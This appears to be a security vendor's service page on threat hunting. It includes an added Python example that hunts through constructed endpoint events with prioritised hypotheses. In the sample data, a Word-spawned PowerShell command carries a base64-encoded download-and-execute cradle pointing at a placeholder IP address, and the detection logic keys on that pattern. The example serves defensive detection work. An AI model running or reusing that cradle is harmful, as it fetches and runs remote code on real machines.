Cybersecurity Service

Threat Hunting

WHOAMI's Threat Hunting service provides proactive threat search through hypotheses based on threat intelligence, attack technique analysis, and hypothesis validation. Unlike reactive detection based solely on rules, our approach identifies advanced and persistent threats that might go unnoticed through directed search and contextual analysis.

Threat Hunting Service

WHOAMI offers its Threat Hunting service to organizations that need to identify advanced and persistent threats that might go unnoticed through traditional detection. Our approach combines proactive search based on hypotheses with threat intelligence relevant to your context.

Threat Hunting for Companies

Our Threat Hunting service is designed for organizations that need to go beyond reactive detection: they seek to identify advanced and persistent threats through proactive search based on hypotheses and threat intelligence. Unlike rule-based detection alone, threat hunting identifies threats that might go unnoticed.

Threat hunting enables your organization to:

  • Identify advanced threats through proactive search based on hypotheses and threat intelligence
  • Detect persistent activity that might go unnoticed through traditional detection
  • Improve security posture through continuous threat identification and recommendations
  • Reduce time to detection by identifying threats before they materialize into incidents
  • Validate controls through identification of gaps in detection and response

Competitive advantage: Threat hunting transforms security from reactive to proactive through directed threat search. We don't wait for threats to be detected: we actively search for them through hypotheses and threat intelligence.

Objectives of the Threat Hunting Service

The main objective of our Threat Hunting service is to identify advanced and persistent threats through proactive search based on hypotheses and threat intelligence, reducing detection time and improving security posture.

Specific objectives include:

  • Identify advanced threats through proactive search based on hypotheses
  • Detect persistent activity that might go unnoticed through traditional detection
  • Validate control effectiveness through identification of detection gaps
  • Improve security posture through continuous threat identification
  • Provide recommendations for detection and response improvement
  • Integrate threat hunting with existing security processes

Benefits of Threat Hunting

The benefits of implementing a Threat Hunting service are significant and go beyond reactive detection:

Proactive Detection

Proactive search identifies threats before they materialize into incidents, or before rule-based detection would catch them, reducing both time to detection and the potential impact of an incident.

Advanced Threat Identification

Threat hunting identifies advanced and persistent threats that might go unnoticed through rule-based detection alone, providing visibility into sophisticated techniques.

Control Validation

Threat identification through threat hunting validates detection control effectiveness, identifying gaps and providing recommendations for improvement.

Continuous Improvement

Threat hunting provides continuous insights about threats and techniques, improving security posture through identification of weaknesses and improvement recommendations.

WHOAMI's Approach to Threat Hunting

Our Threat Hunting service differs by integrating Cyber Intelligence, offensive analysis, and security operations experience with proactive search. We don't perform generic searches: we develop hypotheses based on real threats relevant to your organization.

We integrate our experience in offensive operations and threat analysis to:

  • Develop hypotheses based on threat intelligence relevant to your organization
  • Analyze the tactics, techniques, and procedures (TTPs) of relevant adversaries
  • Validate hypotheses through data analysis and correlation with real threats
  • Provide context about adversaries and techniques to accelerate response
  • Connect threat hunting with Red Team exercises and simulations

WHOAMI Difference

While other Threat Hunting services perform generic searches or use standard frameworks, our approach integrates threat intelligence and offensive analysis to develop relevant hypotheses and validate findings through context about adversaries and techniques. We don't just search: we analyze, validate, and provide context.

Threat Hunting Methodology

Our threat hunting methodology integrates multiple approaches to identify threats effectively:

Hypothesis Development

We develop hypotheses based on threat intelligence and technique analysis:

  • Analysis of threat intelligence relevant to your organization
  • Identification of the tactics, techniques, and procedures (TTPs) of relevant adversaries
  • Development of hypotheses about potential adversary activity
  • Hypothesis prioritization according to probability and potential impact

Search and Analysis

We perform proactive search and data analysis to validate hypotheses:

  • Proactive search for indicators and patterns in security data
  • Analysis of logs, events, and system data to identify suspicious activity
  • Correlation of findings with threat intelligence and known techniques
  • Hypothesis validation through contextual analysis and correlation

Validation and Context

We validate findings and provide context about identified threats:

  • Finding validation through technical analysis and correlation
  • Context analysis about adversaries and used techniques
  • Assessment of potential impact of identified threats
  • Development of recommendations for detection and response

Evolution and Improvement

We evolve hypotheses and improve capabilities according to findings:

  • Development of new hypotheses based on findings and threat intelligence
  • Improvement of detection capabilities based on identified threats
  • Update of rules and processes according to emerging techniques
  • Integration of findings with existing security processes

Result: A threat hunting methodology that identifies advanced and persistent threats through proactive search, providing visibility into sophisticated techniques and recommendations for detection and response improvement.

Deliverables (what the client receives)

A Threat Hunting engagement should specify exactly what the client receives. Our service provides clear and actionable deliverables:

  • Threat hunting report: Detailed analysis of developed hypotheses, performed searches, identified findings, and detected threats
  • Analysis of identified threats: Context about adversaries, used techniques, potential impact, and response recommendations
  • Improvement recommendations: Prioritized guides for detection improvement, alert rules, and response processes based on findings
  • Control validation: Analysis of detection control effectiveness and gap identification
  • Future hypotheses: Development of new hypotheses based on findings and threat intelligence for future searches
  • Review session: Meeting to present results, validate findings, and align actions with security objectives

Result: These deliverables transform Threat Hunting from generic search to contextualized analysis, providing defensible evidence for executives and clear actions for technical teams.

Threat Hunting Service Process

Our Threat Hunting service is structured in phases that ensure effective and sustainable implementation:

Phase 1: Context and Intelligence Analysis

In this initial phase, we analyze context and threat intelligence to develop hypotheses:

  • Analysis of your infrastructure, critical systems, and sensitive assets
  • Review of threat intelligence relevant to your organization
  • Identification of the tactics, techniques, and procedures (TTPs) of relevant adversaries
  • Analysis of historical threats and previous incidents
  • Development of initial hypotheses based on threat intelligence

Phase 1 Result: A set of prioritized hypotheses based on relevant threat intelligence and your organization's context, ready for validation through proactive search.

Phase 2: Search and Validation

During this phase, we perform proactive search and validate hypotheses:

  • Proactive search for indicators and patterns in security data
  • Analysis of logs, events, and system data to identify suspicious activity
  • Correlation of findings with threat intelligence and known techniques
  • Hypothesis validation through contextual analysis and correlation
  • Identification of threats and suspicious activity

Phase 3: Analysis and Context

In this phase, we analyze findings and provide context:

  • Technical analysis of identified threats and suspicious activity
  • Context about adversaries and used techniques
  • Assessment of potential impact of identified threats
  • Development of recommendations for detection and response
  • Validation of detection control effectiveness

Phase 4: Integration and Evolution

Integration and evolution ensure threat hunting remains effective:

  • Integration of findings with existing security processes
  • Development of new hypotheses based on findings and threat intelligence
  • Improvement of detection capabilities based on identified threats
  • Update of rules and processes according to emerging techniques
  • Continuous evolution of methodology according to lessons learned

Important: Threat Hunting requires continuous evolution according to emerging threats. Our service provides periodic searches and hypothesis updates to ensure search remains relevant against evolving threats.

Threat Hunting vs Traditional Detection

Threat Hunting complements traditional detection by providing proactive search:

Threat Hunting

  • Proactive search based on hypotheses and threat intelligence
  • Identification of advanced and persistent threats
  • Contextual analysis of suspicious activity
  • Control effectiveness validation
  • Continuous hypothesis development

Traditional Detection

  • Reactive detection based on rules and signatures
  • Identification of known threats
  • Analysis of automatically generated alerts
  • Alert validation according to predefined rules
  • Maintenance of rules and signatures
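As an added example, not part of the original page and not WHOAMI's own tooling, the Python below models the hunt loop described in the methodology and process sections (hypothesis development with priority by likelihood and impact, search over telemetry, validation by correlation, and the contrast with signature-only detection from the comparison above). It runs over constructed EDR-style process events. The hypothesis, its ATT&CK technique mapping, the known-bad hash feed, the hostnames and the TEST-NET-2 address inside the decoded command are all constructed for illustration; in practice the same logic is expressed as a SIEM or EDR query.

```python
"""Hypothesis-driven hunt over constructed EDR-style process events (added example)."""
from __future__ import annotations

import base64
from collections import defaultdict
from dataclasses import dataclass
from typing import Callable

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
ENC_FLAGS = {"-e", "-ec", "-enc", "-encodedcommand"}


def _enc(script: str) -> str:
    """PowerShell -EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed telemetry: four hosts, ws01 shows the hypothesised document -> shell chain.
EVENTS = [
    {"host": "ws01", "user": "alice", "parent": "explorer.exe", "image": "winword.exe",
     "cmdline": r'winword.exe /n "C:\Users\alice\Downloads\invoice.docm"', "sha256": "a1"},
    {"host": "ws01", "user": "alice", "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + _enc("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s1')"),
     "sha256": "b2"},
    {"host": "ws02", "user": "bob", "parent": "explorer.exe", "image": "excel.exe",
     "cmdline": "excel.exe", "sha256": "a3"},
    {"host": "ws02", "user": "bob", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1", "sha256": "b2"},
    {"host": "ws03", "user": "carol", "parent": "explorer.exe", "image": "winword.exe",
     "cmdline": "winword.exe", "sha256": "a1"},
    {"host": "ws04", "user": "svc", "parent": "services.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c sc query", "sha256": "c4"},
]

# Traditional detection: a constructed IOC feed of known-bad hashes. Nothing above is in it.
KNOWN_BAD_SHA256 = {"f00dfeed"}


def signature_alerts(events: list[dict]) -> list[dict]:
    """Reactive detection only fires on a hash the feed already knows."""
    return [ev for ev in events if ev["sha256"] in KNOWN_BAD_SHA256]


@dataclass(frozen=True)
class Hypothesis:
    name: str
    technique: str                # ATT&CK technique id (assumed mapping)
    likelihood: int               # 1-5, relevance according to threat intelligence
    impact: int                   # 1-5, consequence if true
    test: Callable[[dict], bool]  # what telemetry should show if the hypothesis holds

    @property
    def priority(self) -> int:
        return self.likelihood * self.impact


def decode_encoded_command(cmdline: str) -> str | None:
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        if tok.lower() in ENC_FLAGS:
            try:
                return base64.b64decode(toks[i + 1], validate=True).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def office_spawns_interpreter(ev: dict) -> bool:
    return ev["parent"] in OFFICE_APPS and ev["image"] in INTERPRETERS


def encoded_powershell(ev: dict) -> bool:
    return ev["image"] == "powershell.exe" and decode_encoded_command(ev["cmdline"]) is not None


HYPOTHESES = [
    Hypothesis("Macro document spawns a command interpreter", "T1059", 4, 4, office_spawns_interpreter),
    Hypothesis("Obfuscated PowerShell via -EncodedCommand", "T1059.001", 3, 3, encoded_powershell),
]


def rare_parent_child(events: list[dict], max_hosts: int = 1) -> set[tuple[str, str]]:
    """Stacking: parent->child pairs seen on few hosts deserve analyst attention."""
    hosts: dict[tuple[str, str], set[str]] = defaultdict(set)
    for ev in events:
        hosts[(ev["parent"], ev["image"])].add(ev["host"])
    return {pair for pair, seen in hosts.items() if len(seen) <= max_hosts}


@dataclass
class Finding:
    hypothesis: str
    technique: str
    host: str
    evidence: dict
    corroboration: list[str]

    @property
    def validated(self) -> bool:
        # Validation by correlation: the hypothesis match plus two independent signals.
        return len(self.corroboration) >= 2


def hunt(events: list[dict], hypotheses: list[Hypothesis]) -> list[Finding]:
    """Evaluate hypotheses in priority order and attach context to each hit."""
    rare = rare_parent_child(events)
    findings: list[Finding] = []
    for hyp in sorted(hypotheses, key=lambda h: h.priority, reverse=True):
        for ev in events:
            if not hyp.test(ev):
                continue
            corroboration = []
            if (ev["parent"], ev["image"]) in rare:
                corroboration.append("parent/child pair unique to this host")
            decoded = decode_encoded_command(ev["cmdline"])
            if decoded and ("downloadstring" in decoded.lower() or "iex" in decoded.lower()):
                corroboration.append(f"decoded command is a download cradle: {decoded}")
            findings.append(Finding(hyp.name, hyp.technique, ev["host"], ev, corroboration))
    return findings


if __name__ == "__main__":
    print("signature alerts:", signature_alerts(EVENTS))
    for f in hunt(EVENTS, HYPOTHESES):
        print(f.technique, f.host, "validated" if f.validated else "unvalidated", f.corroboration)
```

On this data the hash feed raises no alert, while both hypotheses fire on the winword.exe to powershell.exe event and are corroborated by rarity and by the decoded download cradle. Two caveats a hunter would apply: rarity stacking over four hosts flags almost every pair, so `max_hosts` has to be set relative to the size of the fleet, and a validated finding here is still an analyst lead, not a confirmed incident, which is why the page's process hands it to incident response for scoping.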

Integration with Other Services

Our Threat Hunting service integrates naturally with other WHOAMI services:

  • Cyber Intelligence: Threat intelligence provides context for hypothesis development and finding validation
  • MDR Services: Threat hunting complements rule-based detection through proactive search
  • Incident Response: Threat hunting findings inform incident response through context about identified threats
  • Red Team: Red Team exercises validate threat hunting effectiveness through attack simulations

Frequently Asked Questions

What is Threat Hunting?

Threat Hunting is the proactive search for threats through hypotheses based on threat intelligence, attack technique analysis, and hypothesis validation. Unlike reactive detection, threat hunting identifies advanced and persistent threats through directed search.

How does Threat Hunting differ from traditional detection?

While traditional detection is reactive and based on rules and signatures, Threat Hunting is proactive and based on hypotheses and threat intelligence. Threat hunting identifies advanced threats that might go unnoticed through traditional detection.

What types of threats does Threat Hunting identify?

Threat Hunting identifies advanced and persistent threats through proactive search: advanced persistent threat (APT) activity, evasion techniques, malicious insider activity, and other sophisticated threats that might go unnoticed through traditional detection.

How frequently is Threat Hunting performed?

Threat hunting frequency depends on your needs and the pace of threat evolution. We provide periodic searches according to developed hypotheses, on-demand searches for emerging threats, and continuous searches integrated with MDR services.

Does Threat Hunting require specialized tools?

Threat Hunting can be performed with existing tools (SIEM, EDR, logs) through data analysis and correlation. It doesn't necessarily require specialized tools, although they can improve efficiency. We work with you to perform threat hunting with your current infrastructure.

How are Threat Hunting hypotheses developed?

Hypotheses are developed based on threat intelligence relevant to your organization, techniques of relevant adversaries, analysis of historical threats, and findings from previous searches. We prioritize hypotheses according to probability and potential impact.

Does Threat Hunting replace traditional detection?

No, Threat Hunting complements traditional detection. Traditional detection identifies known threats through rules and signatures, while threat hunting identifies advanced threats through proactive search. Both approaches work together to provide comprehensive coverage.

Do You Need a Threat Hunting Service?

If your organization needs to identify advanced and persistent threats that might go unnoticed through traditional detection, and improve security posture through proactive search, contact our team to evaluate if the Threat Hunting service is right for you.

Our Threat Hunting service integrates threat intelligence, offensive analysis, and proactive search to identify advanced threats through relevant hypotheses and contextualized validation.

Request Threat Hunting Consultation

Do you need this service?

Contact our team to evaluate whether this service is right for your organization.